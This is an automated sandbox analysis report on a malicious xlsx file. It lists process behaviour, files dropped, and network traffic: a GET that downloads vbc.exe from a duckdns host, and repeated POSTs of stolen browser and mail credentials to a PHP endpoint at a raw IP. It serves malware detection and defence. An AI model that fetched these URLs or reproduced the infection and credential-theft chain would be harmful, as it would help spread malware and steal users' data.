Please wait…
- Estimated result
- Clean Malware
- Detected
- Malicious behavior
- Size
- 781.0 KB
- Format
- xlsx
- SHA1
- 1f751047797521b875c0c667ce17883db99cd1e1
- Report date
- 1579140246486.8745
- Analysis started
- 1579140246147.016
- Use of VNC
- No
- Command to run the file
- Not specified
Behavior
-
malicious
- Creating a process from a recently created file
- Enabling autorun with system ini files
- Sending an HTTP POST request to a potentially dangerous server
-
suspicious
- Sending an HTTP GET request
- Launching a file downloaded from the Internet
- Forced shutdown of a system process
- Unauthorized injection to a system process
- Stealing user critical data
- Connection attempt to a potentially dangerous server
-
neutral
- Creating a window
- Launching a process
- DNS request
- Creating a file in the %AppData% directory
- Creating a file in the %temp% directory
- Creating a file
- Delayed writing of the file
- Launching cmd.exe command interpreter
- Deleting a recently created file
- Reading critical registry keys
- Launching a service
- Changing a file
- Replacing files
- Creating a file in the %AppData% subdirectories
- Enabling the 'hidden' option for recently created files
Process graph
sample
known threat
process creation
injection
web query
RPC request
1
process maliciousness
- PID
- 2948
- Full path
- %ProgramFiles%\microsoft office\office14\excel.exe
- Run parameters
- /dde
- Behavior
- Creating a window
- PID
- 552
- Full path
- <SYSTEM32>\svchost.exe
- Run parameters
- -k DcomLaunch
- Behavior
- Launching a process
- PID
- 276
- Full path
- <SYSTEM32>\svchost.exe
- Run parameters
- -k NetworkService
- Behavior
- DNS request
- PID
- 1396
- Full path
- %CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe
- Run parameters
- -Embedding
- Behavior
- Sending an HTTP GET request, Creating a file in the %AppData% directory, Launching a file downloaded from the Internet, Creating a process from a recently created file
- PID
- 1392
- Full path
- %APPDATA%\vbc.exe
- Behavior
- Creating a file in the %temp% directory, Creating a file, Creating a process from a recently created file, Deleting a recently created file
- PID
- 2624
- Full path
- %TEMP%\norway.exe
- Behavior
- Enabling autorun with system ini files, Delayed writing of the file, Forced shutdown of a system process, Unauthorized injection to a system process, Launching cmd.exe command interpreter
- PID
- 1072
- Full path
- %WINDIR%\syswow64\cmd.exe
- Run parameters
- "<SYSTEM32>\cmd.exe"
- Behavior
- Reading critical registry keys, Stealing user critical data, Changing a file, Replacing files, Connection attempt to a potentially dangerous server, Sending an HTTP POST request to a potentially dangerous server, Creating a file in the %AppData% subdirectories, Deleting a recently created file, Enabling the 'hidden' option for recently created files
- PID
- 412
- Full path
- <SYSTEM32>\services.exe
- Behavior
- Launching a service
- PID
- 428
- Full path
- <SYSTEM32>\lsass.exe
- Behavior
- Creating a file
- PID
- 1320
- Full path
- %WINDIR%\syswow64\cmd.exe
- Behavior
- PID
- 1028
- Full path
- %WINDIR%\explorer.exe
- Behavior
- PID
- 332
- Full path
- <SYSTEM32>\wininit.exe
- Behavior
- Address
- <DNS_SERVER> (8.8.8.8)
- Port
- 53
- Protocol level
- Transport: UDP, Application: DNS
- Query
- ASK nationafourlindustrialandgooglednsline.duckdns.org
- Address
- nationafourlindustrialandgooglednsline.duckdns.org (23.249.162.173)
- Port
- 80
- Protocol level
- Transport: TCP, Application: HTTP
- URL
- GET http://nationafourlindustrialandgooglednsline.duckdns.org/secure/vbc.exe
- Address
- 107.175.150.73
- Port
- 80
- Protocol level
- Transport: TCP, Application: HTTP
- URL
- POST http://107.175.150.73/~giftioz/.golob/fre.php
- Address
- 107.175.150.73
- Port
- 80
- Protocol level
- Transport: TCP, Application: HTTP
- URL
- POST http://107.175.150.73/~giftioz/.golob/fre.php
- Address
- 107.175.150.73
- Port
- 80
- Protocol level
- Transport: TCP, Application: HTTP
- URL
- POST http://107.175.150.73/~giftioz/.golob/fre.php
Description
To ensure autorun and distribution
Creates or modifies the following files
- %WINDIR%\win.ini
Malicious functions
Creates and executes the following
- '' (downloaded from the Internet)
Creates and executes the following (exploit)
- '%APPDATA%\vbc.exe'
Injects code into
the following system processes:
- %WINDIR%\syswow64\cmd.exe
Terminates or attempts to terminate
the following system processes:
- %WINDIR%\syswow64\cmd.exe
Reads files which store third party applications passwords
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
Modifies file system
Creates the following files
- %APPDATA%\vbc.exe
- %TEMP%\$rptsprg9mref
- %TEMP%\relax-ng-compact-syntax.xml
- %TEMP%\trapezium
- %TEMP%\norway.exe
- %TEMP%\whorehouse.dll
- %TEMP%\nsze666.tmp\userinfo.dll
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %APPDATA%\e6f983\35a09b.hdb
- %APPDATA%\e6f983\35a09b.lck
- %APPDATA%\e6f983\35a09b.exe
Sets the 'hidden' attribute to the following files
- %APPDATA%\e6f983\35a09b.exe
Deletes the following files
- %TEMP%\nsze666.tmp\userinfo.dll
- %APPDATA%\e6f983\35a09b.lck
Substitutes the following files
- %APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1960123792-2022915161-3775307078-1001\f58155b4b1d5a524ca0261c3ee99fb50_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Network activity
Connects to
- '107.175.150.73':80
TCP
HTTP GET requests
- http://nationafourlindustrialandgooglednsline.duckdns.org/secure/vbc.exe
HTTP POST requests
- http://107.175.150.73/~giftioz/.golob/fre.php
UDP
- DNS ASK nationafourlindustrialandgooglednsline.duckdns.org
Miscellaneous
Creates and executes the following
- '%TEMP%\norway.exe'
Executes the following
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\cmd.exe'
- API log [0]
Time | Process | Event | Arguments |
---|
Network activity map
less than 5 connections
5-10 connections
more than 10 connections
Protocol | Address | Application level data |
---|